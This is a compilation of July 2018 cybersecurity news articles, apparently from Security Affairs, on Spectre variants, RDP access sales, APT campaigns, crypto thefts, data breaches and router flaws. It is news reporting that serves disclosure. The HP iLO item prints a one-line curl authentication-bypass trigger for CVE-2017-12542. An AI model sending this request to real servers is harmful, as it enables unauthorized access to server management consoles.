“Spectre3.0, aka Meltdown , relies on lazy enforcement of User/Supervisor protection flags for page-table entries (PTEs). The same mechanism can also be used to bypass the Read/Write PTE flags. We introduce Spectre1.2, a minor variant of Spectre-v1 which depends on lazy PTE enforcement, similar to Spectre-v3.”In a Spectre1.2 attack, speculative stores are allowed to overwrite read-only data, code pointers, and code metadata, including vtables, GOT/IAT, and control-flow mitigation metadata. As a result, sandboxing that depends on hardware enforcement of read-only memory is rendered ineffective.,” continues the research paper.
ARM confirmed that Spectre 1.1 flaw affects also its processor but avoided to mention flawed ARM CPUs.
Mayor tech firms, including Microsoft, Red Hat and Oracle have released security advisories, confirming that they are investigating the issues and potential effects of the new Spectre variants.
“Microsoft is aware of a new publicly disclosed class of vulnerabilities referred to as “speculative execution side-channel attacks” that affect many modern processors and operating systems including Intel, AMD, and ARM. Note: this issue will affect other systems such as Android, Chrome, iOS, MacOS, so we advise customers to seek out guidance from those vendors.” reads the advisory published by Microsoft.
“An attacker who successfully exploited these vulnerabilities may be able to read privileged data across trust boundaries. In shared resource environments (such as exists in some cloud services configurations), these vulnerabilities could allow one virtual machine to improperly access information from another.”
Do you want penetrate an airport network? An RDP access to internal machine goes for $10 on the dark web.
12.7.2018 securityaffairs Hacking
The access to a system at a major international airport via RDP (Remote Desktop Protocol) could be paid only $10 on the Dark Web.
Experts at McAfee have discovered hackers offering RDP access to compromised machines worldwide while analyzing several black markets.
The researchers discovered shops offering between 15 to more than 40,000 RDP connections for sale, the largest one is the Russian Ultimate Anonymity Service (UAS).
The second-largest RDP shop experts researched is BlackPass, where it is possible to find the widest variety of products, including RDP access into computers.
Other RDP shops in the dark web are Flyded, and xDedic that was discovered by experts from Kaspersky in June 2016.
Crooks are increasingly leveraging RDP connections in their attacks, many campaigns used RDP to distribute malware, such as the SamSam ransomware.
Cybercriminals also started offering in the dark web RDP accessed to high-value networks for less than $1 or scanning services for accessible systems.
Sellers in major black marketplaces offer RDP accesses to a broad range of systems, ranging from Windows XP to Windows 10. The experts noticed that Windows 2008 and 2012 Server are the most popular with 11,000 and 6,500 accesses respectively.
“The advertised systems ranged from Windows XP through Windows 10. Windows 2008 and 2012 Server were the most abundant systems, with around 11,000 and 6,500, respectively, for sale.” reads the analysis published by McAfee.
“Prices ranged from around US $3 for a simple configuration to $19 for a high-bandwidth system that offered access with administrator rights.”
Experts also found accesses to systems running Windows Embedded Standard (or Windows IOT), the offers at UAS Shop and BlackPass were characterized by hundreds of identically configured machines associated with municipalities, housing associations, and healthcare institutions in the Netherlands. The offer of black markets also includes multiple government systems worldwide.
Analyzing the UAS Shop, the researchers discovered a recently added Windows Server 2008 R2 Standard machine available at only $10 that was located in a major International airport in the United States.
The seller was offering it with three user accounts, the administrator account, and other two associated with a company specializing in airport security and building automation and with another specializing in camera surveillance and video analytics for airports.
Such kind of accesses could be very dangerous because they offer an entry point in critical infrastructure for attackers.
“We did not explore the full level of access of these accounts, but a compromise could offer a great foothold and lateral movement through the network using tools such as Mimikatz,” explained McAfee.
The surprises are not ended, the researchers found an account on another system associated with a domain that appears to be related to “the airport’s automated transit system, the passenger transport system that connects terminals.”
“Now we know that attackers, like the SamSam group, can indeed use an RDP shop to gain access to a potential high-value ransomware victim. We found that access to a system associated with a major international airport can be bought for only $10—with no zero-day exploit, elaborate phishing campaign, or watering hole attack.” conclude the researchers.
“Governments and organizations spend billions of dollars every year to secure the computer systems we trust. But even a state-of-the-art solution cannot provide security when the backdoor is left open or carries only a simple padlock.”
China-based TEMP.Periscope APT targets Cambodia’s elections
12.7.2018 securityaffairs APT
FireEye uncovered a large-scale Chinese phishing and hacking campaign powered by Temp.periscope APT aimed at Cambodia’s elections.
Security researchers at FireEye have uncovered a large-scale Chinese phishing and hacking campaign aimed at Cambodia’s elections.
The hackers distributed a remote access trojan (RAT) and data exfiltration operation targeting the poll.
The experts from FireEye attributed the attacks to an APT group tracked as TEMP.Periscope that targeted in past operations American engineering and maritime operations.
FireEye found evidence of infection on systems used by election-related entities in Cambodia, including the National Election Commission, human rights advocates, an MP for the Cambodia National Rescue Party, two Cambodian diplomats in overseas posts, and some media outlets.
“FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia’s politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures.” reads the analysis published by FireEye.
“This campaign occurs in the run up to the country’s July 29, 2018, general elections.”
TEMP.Periscope used the same infrastructure of other campaigns against other targets, including the defense industrial base in the United States and a chemical company based in Europe.
Analyzing this campaign, FireEye found files on three open indexes operated by the attackers, in this way the company gathered information about group’s TTPs and its targets. The activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia’s government and elections.
Two servers (chemscalere[.]com and scsnewstoday[.]com) is used to operate a typical Command and Control infrastructure and hosting sites, while a third one, mlcdailynews[.]com, works as an active SCANBOX server.
SCANBOX is another APT that FireEye has monitored in various campaigns since 2015, the presence of a SCANBOX server suggested TEMP.Periscope was also planning to target individuals with an interest in US-East Asia politics, Russia, and NATO affairs in forthcoming campaigns.
The servers contain both malware and logs, the analysis of the latter revealed:
Analysis of logs from the three servers revealed:
Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX) .
The servers were administered by operators based in Hainan (one of the IP addresses, 112.66.188[.]28, is located in Hainan, China), and experts found two new malware families hosted on them, DADBOD and EVILTECH, and other malware families detected in the past (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX)”.
The most active tolls of this campaign were the AIRBREAK backdoor, the HOMEFRY password cracker and dumper; the LUNCHMONEY uploader and a command line reconnaissance tool called MURKYTOP.
Malware Function Details
During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.
DADBOD Credential Theft
DADBOD is a tool used to steal user cookies.
Analysis of this malware is still ongoing.
The experts attributed the attacks to China, other IP addresses involved in the campaign are associated with virtual private servers, but researchers noticed that artifacts indicate that the computers used to log in all cases are configured with Chinese language settings.
“The activity uncovered here offers new insight into TEMP.Periscope’s activity.” concludes FireEye. “Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections”
Hackers steal $13.5 Million from Israeli Bancor exchange
11.7.2018 securityaffairs CyberCrime
The Israeli-based decentralized cryptocurrency Bancor exchange is the last victim of a security breach in the cryptocurrency industry.
According to a statement published by the Bancor exchange, an unknown hacker has stolen roughly $13.5 million worth of cryptocurrency.
The security breach occurred on July 9, 2018 at 00:00 UTC, the attackers gained access to one of the wallets operated by the Israeli exchange, no user wallets were compromised.
This morning (CEST) Bancor experienced a security breach. No user wallets were compromised. To complete the investigation, we have moved to maintenance and will be releasing a more detailed report shortly. We look forward to being back online as soon as possible.
12:56 PM - Jul 9, 2018
88 people are talking about this
Twitter Ads info and privacy
The company moved its infrastructure to maintenance to conduct the investigation.
Bancor exchange doesn’t operate as a classic exchange platform, it used a complex mechanism based on smart contracts running on the Ethereum platform to improve the speed of transactions compared with classic exchange platforms.
“With Bancor exchange, every transaction is executed directly against a smart contract. This means that converting a cryptocurrency does not require matching two parties in real-time with opposite wants; rather, it can be completed by a single party directly through the token’s smart contract.” reads the company.
The attackers gained the access to a company wallet to withdraw $12.5 million (24,984 Ether (ETH) from Bancor smart contracts and transfer the funds to a private wallet they controlled.
The attackers also withdrew 229,356,645 Pundi X (NPXS) ($1 million) from another wallet.
The attackers also withdrew 3,200,000 Bancor tokens (BNT) (roughly $10 million) that were obtained by Bancor last year as part of its ICO that raised over $150 million. Fortunately, a security feature in Bancor tokens allowed the company to freeze the transfers of funds making impossible for the hackers to move them to other wallets.
Here is the latest update on the recent security breach:
10:35 PM - Jul 9, 2018
505 people are talking about this
Twitter Ads info and privacy
“It is not possible to freeze the ETH and any other stolen tokens,” reads the statement published by Bancor.
“However, we are working together with dozens of cryptocurrency exchanges to trace the stolen funds and make it more difficult for their thief to liquidate them.”
Bancor did not reveal how the hackers have breached its wallet and stolen the funds.
Critical flaws patched in ISP Advanced Digital Broadcast Broadband devices
11.7.2018 securityaffairs Vulnerebility
Advanced Digital Broadcast has rolled out security patched to fix three critical vulnerabilities in Its Broadband gear.
Advanced Digital Broadcast has released patches for three critical vulnerabilities affecting broadband gateways. All the ADB Broadband Gateways and Routers based on Epicentro platform are affected by the vulnerabilities.
The flaws were discovered nearly two years ago, they are a privilege escalation bug, an authorization bypass issue, and a local jailbreak bug.
The Advanced Digital Broadcast manufactures routers and network devices dozens of broadband and telco firms.
The vulnerabilities were first discovered in June 2016 by experts at SEC Consult Vulnerability Lab.
The company started rolling out the patches in July 2017.
Let’s see in detail the three flaws:
The CVE-2018-13108 flaw is a local root jailbreak flaw that can be exploited leveraging a network file sharing vulnerability.
“By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with highest privileges,” according to researchers. “Attackers are able to modify any settings that might have otherwise been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys.”
Experts explained that the “network file sharing” feature of ADB broadband devices via USB leverages a Samba daemon to access be USB devices. The access has the highest access rights and exports the network shares with root user permissions. Attackers can abuse the Samba daemon that runs in the background to access the USB port.
The CVE-2018-13109 authorization bypass vulnerability that affects some versions of firmware used in ADB broadband devices. The flaw could be exploited by an attacker to gain access to the device settings within the web interface otherwise forbidden to the user.
“By exploiting the authorization bypass vulnerability on affected and unpatched devices an attacker is able to gain access to settings that are otherwise forbidden for the user, e.g. through strict settings set by the ISP.” researchers wrote. “It is also possible to manipulate settings to e.g. enable the telnet server for remote access if it had been previously disabled by the ISP.”
The CVE-2018-13110 privilege escalation vulnerability via Linux group manipulation that could be exploited by an attacker to gain access to the command line interface (CLI) of the device, even if the CLI was previously disabled by the ISP.
“By exploiting the group manipulation vulnerability on affected and unpatched devices an attacker is able to gain access to the command line interface (CLI) if previously disabled by the ISP.” researchers wrote.
“Depending on the feature-set of the CLI (ISP dependent) it is then possible to gain access to the whole configuration and manipulate settings in the web GUI and escalate privileges to highest access rights.”
ADB has released an updated firmware that addresses the flaws.
HNS Botnet evolves and targets cross-platform database solutions
11.7.2018 securityaffairs BotNet
The HNS IoT botnet (Hide and Seek) originally discovered by BitDefender in January evolves and now targets cross-platform database solutions.
Do you remember the Hide ‘N Seek (HNS) botnet?
The IoT botnet Hide ‘N Seek botnet appeared in the threat landscape in January, when it was first spotted on January 10th by malware researchers from Bitdefender. It was first discovered on January 10, then it disappeared for a few days, and appeared again a few weeks later infecting in less than a weeks more than 20,000 devices.
Researchers at Bitdefender found similarities between the Hide ‘N Seek botnet and the Hajime botnets, unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.
Bitdefender experts discovered that Hide ‘N Seek botnet exploited the CVE-2016-10401 flaw, and other vulnerabilities to propagate malicious code and steal user data.
HNS botnet looks for systems to infect by scanning the Internet for fixed TCP port 80/8080/2480/5984/23 and other random ports. The HNS botnet borrows code from Mirai botnet.
The Hide ‘N Seek is now targeting also cross-platform database solutions, it is currently the first IoT malware that implements a persistence mechanism to keep devices infected after reboots.
“2P-like botnets are hard to take down, and the HNS botnet has been continuously updated over the past few months,” reads the analysis published by Netlab Qihoo 360 researchers.
“some major updates we see:
Added exploits for AVTECH devices (webcam, webcam), CISCO Linksys router, JAWS/1.0 web server, Apache CouchDB, OrientDB; with the two devices mentioned in the original report, HNS currently supports 7 exploiting methods all together
Hard-coded P2P node addresses have been increased to 171;
In addition, we observed that the HNS botnet adds a cpuminer mining program, it is not functioning properly yet.
In particular, with the added support of OrientDB and CouchDB database servers, HNS is no longer just an IoT botnet, but a cross-platform botnet now.”
According to Netlab, the Hide ‘N Seek (HNS) botnet now targets the following types of devices using the following exploits:
(new) AVTECH RCE
(new) CISCO Linksys Router RCE
(new) JAW/1.0 RCE
(new) OrientDB RCE
(new) CouchDB RCE
Experts pointed out that the HNS has also started dropping a miner payload, but the good news is that it is not functioning properly yet.
Further technical details on the Hide ‘N Seek botnet, including the IoCs, are reported in the analysis published by the Netlab team.
Smart Speaker Banking Is Coming to a Device Near You, But Is It Secure?
11.7.2018 securityaffairs Virus
Smart speaker Banking Is coming to a device near you, Which are the cyber risks associated with their use? Are they a new opportunity for attackers?
The popularity of voice-activated smart speakers like the Google Home and Amazon Echo has made brands, and industries realize there’s adequate demand for introducing technology that lets people accomplish things just by speaking.
They can order items, check traffic in their areas and search for information, among other conveniences.
Soon, smart speaker owners can take care of their banking needs. Should you consider taking that approach, too?
Check Balances and Pay Credit Card Bills
Regional brand U.S. Bank is the first establishment in the financial industry to unveil online banking opportunities that work with all three virtual assistants — Alexa, Google Assistant and Siri — making it relevant to a significant segment of the market.
After a soft launch, U.S. Bank started marketing the option to its customers in June 2018. For now, customers can check their account balances and make credit card or mortgage payments. The brand is also reportedly considering letting people transfer money to other account holders.
Also, smaller banks and credit unions offer similar functionality. Capital One and American Express let people pay bills through their smart speakers, too.
Smart Speakers Could Reveal Private Details
Most skills for the Amazon Echo that emphasize productivity give audible information to users. The idea is that they can do things without fumbling with their phones or otherwise using their hands.
The banking apps that work with Amazon and Google smart speakers give information through spoken responses to verbal prompts.
In contrast, people using Apple’s Siri assistant can do some banking tasks with iOS apps that support Siri, but they only see their information displayed on screens. Banking skills are not available on Apple’s HomePod speaker yet, and the company hasn’t divulged if they’re on the horizon.
Imagine the privacy concerns if you use a smart speaker banking app, and it lets your mother-in-law — who’s temporarily living with you — know how much money is in your account because she overhears the speaker’s reply to your prompt?
That’s an example of how a feature that’s supposed to be convenient could instead broadcast sensitive details to others who are nearby.
Users Must Set Up PINs
The banks that provide information to smart speaker owners require people to set up four-digit PINs and recommend that they be different than the individuals’ ATM PINs. As there are with passwords, there are recommended ways to pick a good PIN, too. However, not everyone follows these. Many take the risk of prioritizing handiness over security by setting up passwords that are easy to remember — but equally as easy for others to guess.
Also, although the Google Assistant and Amazon’s Alexa support individual voice recognition, U.S. Bank hasn’t enabled that feature on the platform yet. Security analysts point out that even with voice recognition technology in place, hackers could still record a person speaking and play it back for the speaker to detect later.
And the PINs people enter at ATMs aren’t as secure as many people think. Criminals can use hidden cameras or false keypads to capture PINs as people put them into the machines.
Research also found the motion-sensitive components of smartwatches could capture PIN data, then allow hackers to figure out what numbers they enter with up to 80 percent accuracy on the first attempt.
You can probably envision a scenario where a determined hacker devises a plan to hear a person’s spoken PIN sent to a smart speaker, too.
For example, maybe a smart speaker owner is in the habit of using such a device that’s on a nightstand a few feet away from a window to check a bank account balance each morning. If someone realizes that individual often keeps that window open in hot weather and learns their banking routine, they could wait outside the window to hear the details.
Image by Rahul Chakraborty
The Potential for Misunderstood Transfer Requests
If you eventually have the option to transfer money with a smart speaker, that option may not be failsafe, either, especially if you have to utter the person’s name to confirm your request.
Smart speakers have highly sensitive microphones, but they still don’t pick up on everything correctly. In one case, a toddler said “Alexa, play Digger Digger,” and an Amazon Echo Dot started providing pornographic content while adults in the background frantically told it to stop.
What if a smart speaker misinterprets either the name of the person who should receive your money or the amount you want to send? In either case, you could find yourself dealing with a tricky situation that’s difficult to rectify.
Hackers Always Find Ways to Orchestrate Attacks
As with anything else, it’s crucial to weigh the pros and cons. Sure, it might be great to pay your credit card bill with only a vocal command, but are you willing to let a potentially vulnerable smart speaker possess some of your most lucrative information?
Because the possibility of banking with your smart speaker is still so new, speculation primarily informs musings about the security risks that convenience could bring. If smart speaker banking becomes a mainstream practice, hackers will undoubtedly intensify their efforts to break into the speakers and get details that could compromise victims’ financial situations.
About the Author:
Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.
Hacker hijacked original LokiBot malware to sell samples in the wild
11.7.2018 securityaffairs Virus
An expert found evidences that demonstrate the current distributed LokiBot malware samples were “hijacked” by a third actor.
According to the researcher who goes online by the Twitter handle “d00rt,” samples of the LokiBot malware samples being distributed in the wild are modified versions of the original sample.
I just released an article where are evidences that demonstrate the current distributed #LokiBot infostealer samples were "hijacked" by a third actor. In the repository there are Scripts for extracting the static config and code for disinfecting. https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf …
10:25 AM - Jul 6, 2018
Contribute to hijacked_lokibot_version development by creating an account on GitHub.
84 people are talking about this
Twitter Ads info and privacy
The Lokibot malware has been active since 2015, it is an infostealer that was involved in many malspam campaigns aimed at harvest credentials from web browsers, email clients, admin tools and that was also used to target cryptocoin-wallet owners.
The original LokiBot malware was developed and sold by online by a hacker who goes online by the alias “lokistov,” (aks Carter).
The malicious code was initially advertised on many hacking forums for up to $300, later other threat actors started offering it for less than $80 in the cybercrime underground.
According to d00rt there is an explanation for such kind of proliferation online, a threat actor may have “hijacked” the original malware, and even without having a direct access to the original source code he was able to offer other hackers the possibility to set up their own domains for receiving the stolen data.
The expert reversed many pieces of malware and found five references to the C&C server, four of them are encrypted using Triple DES algorithm and one using a simple XOR cipher.
The malware uses the function “Decrypt3DESstring” to decrypt the encrypted strings and get the URL of the command-and-control server.
According to the expert, the Decrypt3DESstring found in the sample he analyzed is different from the ones available in previous variants of the LokiBot malware
The new Decrypt3DESstring function discovered in new samples always return value from the XOR-protected string, instead of Triple DES strings.
“The 3DES protected URLs are always the same in the all of the LokiBot samples of this version,” the researcher wrote.
“Therefore, those URLs are never used. Decrypt3DESstring returns a 3DES decrypted buffer. This should be the ideal behavior of this function, but as was described before, each time Decrypt3DESstring is called, it returns a decrypted url with XOR or encrypted url with XOR.”
The expert explained that anyone with a new sample of LokiBot could use a simple HEX editor to modify the program and add its custom URLs for receiving the stolen data.
“The newest (or the most extended) LokiBot samples are patched. There is a new section called “x” where is a xored url. That url is the control panel url. Keeping that in mind, it would be very easy to create a builder, for creating LokiBot samples with a new control panel and sell it. You could change the xored url with another xored url using a hex editor or with a simple script.” continues the analysis published by the expert.
“There exist a builder in the underground forums which is able to create new
LokiBot samples with a custom control panel. As I explained before, this builder
encrypts the control panel with xor an writes it in the “x” section.
d00rt discovered several LokiBot samples available for sale on the underground market that were patched by using a builder available in the underground forums.
The author of LokiBot malware, meantime, has launched the new version 2.0 and he is offering it on many forums.
The decryption function was also being used to get registry values required for making the malware persistent on a system, but since after patching the decryption function only returns a URL, the new LokiBot samples fails to restart after the device reboots.
The expert also discovered that the modification introduced to patch the malware introduces a couple of bugs in malicious code.
Some strings of LokiBot malware are encrypted and the malware uses the function Decrypt3DESstring to decrypt them. After patching this function, it always returns the same string that is the XORed url which is located at “x” section.
“The following is the registry key name used in persistence:
This registry key is encrypted using 3DES algorithm. When the patched LokiBot tries to get persistence, it uses Decrypt3DESstring to decrypt the registry key name. But because that function is patched, the returned string is the url at “x” section, instead of the registry key.
Further technical details for the threat are reported in the research paper published by the expert on GitHub.
Timehop data breach, data from 21 million users exposed
11.7.2018 securityaffairs Incindent
Timehop, the service that aims to help people in finding new ways to connect with each other by analyzing past activities, has been hacked.
Timehop is a service that aims to help people in finding new ways to connect with each other by analyzing past activities.
“Timehop created the digital nostalgia category and continues to be THE team reinventing reminiscing for the digital era. We have more “old” photos and content than ever before, yet most of the internet focuses on “new”.” reads its website.
The Timehop service leverages posts from many social networks to build its own memory and use it to create new connections, but something went wrong.
The company admitted that data describing 21 million members may have been exposed.
Unknown attackers breached into its systems, the company discovered the intrusion while the hackers were exfiltrating the data.
“On July 4, 2018, Timehop experienced a network intrusion that led to a breach of some of your data. We learned of the breach while it was still in progress, and were able to interrupt it, but data was taken. While our investigation into this incident (and the possibility of any earlier ones that may have occurred) continues, we are writing to provide our users and partners with all the relevant information as quickly as possible.” reads the data breach notification published by the company.
Stolen data includes names, email addresses, and some phone numbers, while no private/direct messages, financial data, or social media or photo content, or Timehop data including streaks were exposed.
The company pointed out that none of the users’ “memories,” – the social media posts & photos that Timehop stores, were accessed by the attackers.
The company admitted that hackers obtained access credential to its cloud computing environment, that incredibly was not protected by multifactor authentication.
The security team locked out the attackers two hours and nineteen minutes later its discovery.
The attackers also accessed the keys that let Timehop read and show you your social media posts (but not private messages), in response to the incident the IT staff at the company has deactivated them, this means that users will have to re-authenticate to their App.
The bad news is that the security breach also exposed access tokens used by Timehop to access other social networks such as Twitter, Facebook, and Instagram. Timehop tried to downplay the problem explaining that the tokens have been quickly revoked and currently don’t work.
“Second, we want to be clear that these tokens do not give anyone (including Timehop) access to Facebook Messenger, or Direct Messages on Twitter or Instagram, or things that your friends post to your Facebook wall. In general, Timehop only has access to social media posts you post yourself to your profile.” continues the company’s notification.“However, it is important that we tell you that there was a short time window during which it was theoretically possible for unauthorized users to access those posts – again, we have no evidence that this actually happened.“
Timehop is warning its users that provided a phone number for the authentication of taking additional security precautions with their cellular provider to ensure that their number cannot be ported.
The company now has taken steps to improve the security of its architecture, including the adoption of multifactor authentication to secure our authorization and access controls on all accounts.
Technical details about the incident have been published in this post.
HP iLO servers running outdated firmware could be remotely hacked
11.7.2018 securityaffairs Hacking
Hewlett Packard Integrated Lights-Out 4 (HP iLO 4) servers are affected by a critical Bypass Authentication vulnerability, technical details and a PoC code have been published online.
The flaw, tracked as CVE-2017-12542, received a severity score of 9.8 out of 10 because it is very simple to exploit.
“Integrated Lights-Out, or iLO, is a proprietary embedded server management technology by Hewlett-Packard which provides out-of-band management facilities. The physical connection is an Ethernet port that can be found on most Proliant servers and microservers of the 300 and above series.” reads Wikipedia.
iLO cards allow administrators to perform a broad range of management activities in a company network, including to install firmware remotely and provide access to a remote console.
The flaw was discovered by three security researchers (Fabien Périgaud from Synacktiv, Alexandre Gazet from Airbus, and the independent security researcher Joffrey Czarny) last year and potentially expose any iLO servers exposed online at risk.
The flaw could be exploited by a remote authenticated attack to access to HP iLO consoles, extract cleartext passwords, execute malware, and even replace iLO firmware.
The experts discovered that it is possible to exploit issue by using a cURL request and 29 letter “A” characters:
curl -H "Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
In the following images, the experts demonstrate how to bypass iLO authentication, in this case how to retrieve a local user’s password in cleartext.
The good news is that HP addressed the flaw in August 2017 with the release of the iLO 4 firmware version 2.54, for this reason, system administrators need to upgrade their servers.
The flaw affects HP iLO 4 servers running firmware version prior to 2.53.
The experts presented their findings at some security conferences, including the ReCon Brussels (Slides, research paper ) and SSTIC 2018.
The PoC exploits for the flaw are available at the following URLs:
A Metasploit module for the flaw is available here.
GoDaddy-owned hosting company Domainfactory hacked
11.7.2018 securityaffairs Hacking
The hosting company Domainfactory has taken down its forums after hackers posted messages claiming to have breached into its infrastructure.
While I was writing about the Timehope security breach, another incident is making the headlines, the victim is the German hosting company Domainfactory.
The hosting company, that was owned by GoDaddy since 2016, has taken down its forums after hackers posted messages informing visitors that they have breached into the Domainfactory infrastructure.
The company notified the data breach to the customers and asked them to change their passwords.
“On July 3, 2018, a person in the DomainFactory forum claimed access to DomainFactory customer data. We initiated a detailed investigation and found that customer data was accessed by an outside party without authorization. The access route is now secured.” wrote a company representative.
“We contact all customers with the recommendation to update their DomainFactory passwords. Instructions for changing your passwords can be found here:
We have notified the data protection authority and commissioned external experts with the investigation. The protection of the data of our customers is paramount and we regret the inconvenience this incident causes, very much.”
The company notified the data protection authorities and is investigating the hack with the help of external experts.
The Domainfactory staff first learned of the incident in the early evening of July 3, 2018, the security team dated the data breach as January 28, 2018.
A first investigation confirmed that unauthorized third parties could have had access to the several categories of data, including customer name, company name, customer number, address, E-mail addresses, phone number, DomainFactory phone password, date of birth, bank name and account number (eg IBAN or BIC), and Schufa score.
In response to the attack, the company secured the breached systems.
The hack was disclosed by the German media outlet Heise, that noticed the strange messages of the hackers published on the forums.
The German journalist Fabian Scherschel also posted on Twitter (in German) that he noticed a thread, before public disclosure of the incident, “in which Lauter #Domainfactory customers ask a hacker about their data because DF does not respond to their requests”
Fabian A. Scherschel
Ich sitze hier in nem Twitter-Thread in dem lauter #Domainfactory-Kunden einen Hacker nach ihren Daten fragen, weil DF nicht auf ihre Anfragen reagiert. Ist das jetzt schon #PostDSGVO? 😅
5:16 PM - Jul 7, 2018
Datenleck bei Domainfactory: Kunden sollen Passwörter ändern
Nachdem weitere Details zum Angriff auf Domainfactory bekannt wurden, bittet der Hoster alle seine Kunden, ihre Passwörter zu ändern.
29 people are talking about this
Twitter Ads info and privacy
According to the Heise, hackers exploited a variant of the Dirty Cow flaw to breach into the systems.
Polar fitness app broadcasted sensitive data of intelligence and military personnel
11.7.2018 securityaffairs BigBrothers
The Mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel.
A new privacy incident involved Fitness application and military. this time the Mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel from 69 countries.
This is the second incident in a few months, in January experts discovered that military worldwide have publicly shared online their exercise routes recorded through the fitness tracker Strava revealing the fitness sessions conducted inside or near military bases.
During the weekend, Dutch security experts revealed they were able to find data on some 6,000 individuals including military personnel from dozens of countries and FBI and National Security Agency personnel.
According to an investigation by the news website Bellingcat and the Dutch news agency De Correspondent, the fitness devices were leaking data belonging to the military or intelligence officials who could be exploited by a threat actors to spy on them.
“With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning,” explained the security researcher Foeke Postma that investigated the case with the Dutch news outlet De Correspondent.
“We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer’s identity.”
The experts discovered detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea.
The exposure of such data poses serious risks to the military personnel as reported in a post published by Defensenews.com.
“Bellingcat was able to pinpoint the name of a “high-ranking officer” at a base known to host nuclear weapons. It took just a few clicks. Using the Polar Flow app and other information found on the internet, De Correspondent was able to collect a disturbing amount of one Dutch solider’s personal information.” reads the blog post published by Defensenews.com.
“They found the name of the solider, the fact he was stationed at one of the key locations where the war against the Islamic State is being waged from, the soldier’s home address, and the names of his wife and kids.”
In response to the privacy incident, Polar has disabled the feature that allowed users to share data and pointed out that any data made public was the result of users who opted in to location tracking.
The company has already implemented a number of measures to mitigate the exposure of its users along with the suspension for the Flow Explore feature until further notice.
The location tracking feature allows thousands of athletes daily all over the world to share and data related to their training sessions.
“If there hasn’t been a data breach, why have you suspended the Explore feature?
While the decision to opt-in and share training sessions and GPS location data is the choice and responsibility of the customer, we are aware that potentially sensitive locations were appearing in public data, and have made the decision to suspend the Explore until further notice.” reads the statement published by Polar.
“I have seen statements that suggest that Polar leaked data – Did Polar leak any data?Contrary to what has been reported—it’s important to clarify that Polar has not leaked any data. Furthermore, there has been no breach of private data.”
De Correspondent investigation revealed that only about two percent of Polar users chose to share their data, but journalists and experts were able to collect sensitive data from military or civilian personnel.
“We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea,” states the De Correspondent report.
BlackTech APT using stolen D-Link certificates to spread malware
11.7.2018 securityaffairs APT
A cyber-espionage group tracked as BlackTech is abusing code-signing certificates stolen from D-Link for the distribution of their malware.
Security experts from ESET discovered that an APT group tracked as BlackTech is using code-signing certificates stolen from Taiwanese-based tech firm D-Link and the security company Changing Information Technology Inc.
According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.
The attackers used the certificates to sign the code of the Plead backdoor that has been in the wild since at least 2012.
The Plead backdoor was used by threat actors to exfiltrate confidential documents from Taiwanese government agencies and private organizations.
“We spotted this malware campaign when our systems marked several files as suspicious. Interestingly, the flagged files were digitally signed using a valid D-Link Corporation code-signing certificate.” reads the analysis published by ESET.
“The exact same certificate had been used to sign non-malicious D-Link software; therefore, the certificate was likely stolen.”
ESET reported the abuses to the D-Link that revoked two certificates on July 3 and informed its customers that most of them should not be affected by the revocation.
“D-Link recently discovered that two of its code signing certificates were misappropriated. Upon discovery, we immediately decommissioned the certificates and investigated the issue.” reads the advisory published by D-Link.
“Like several other companies in Asia, D-Link was victimized by a highly active cyber espionage group which has been using PLEAD Malware to steal confidential information from companies and organizations based in East Asia, particularly in Taiwan, Japan, and Hong Kong. The two affected D-Link certificates were revoked, effective July 3rd, 2018. New certificates have been issued to resolve this problem.”
Taiwan-based Changing Information Technology Inc. revoked the abused certificate on July 4, but according to ESET, the hackers continued to use it to spread the malware.
ESET identified two different malware families that were abusing the stolen certificate, the Plead backdoor, and a related password stealer component that could gather saved passwords from Google Chrome, Microsoft Internet Explorer, Microsoft Outlook, and Mozilla Firefox.
The signed Plead backdoor are highly obfuscated with junk code, it was used to download from a remote server or opens from the local disk a small encrypted binary blob. This blob includes an encrypted shellcode that downloads the final Plead backdoor module.
Why do the attackers steal digital certificates?
Attackers use to sign the malicious code with digital certificates in the attempt to make the malware appearing like legitimate applications bypassing security measures.
The most popular case of a malware abusing code-signing certificates was the Stuxnet worm, that misused digital certificates stolen from RealTek and JMicron.
Just using a $39 device it is possible to defeat new iOS USB Restricted Mode
11.7.2018 securityaffairs Apple
Once USB Restricted Mode is enabled on a device, no data communications occur over the Lightning port, but experts found a way to reset the countdown timer.
Recently Apple released the iOS 11.4.1 that introduced a new security feature, dubbed USB Restricted Mode, designed to protect your devices against USB accessories used by forensics experts and law enforcement agencies to analyze iPhone or iPad.
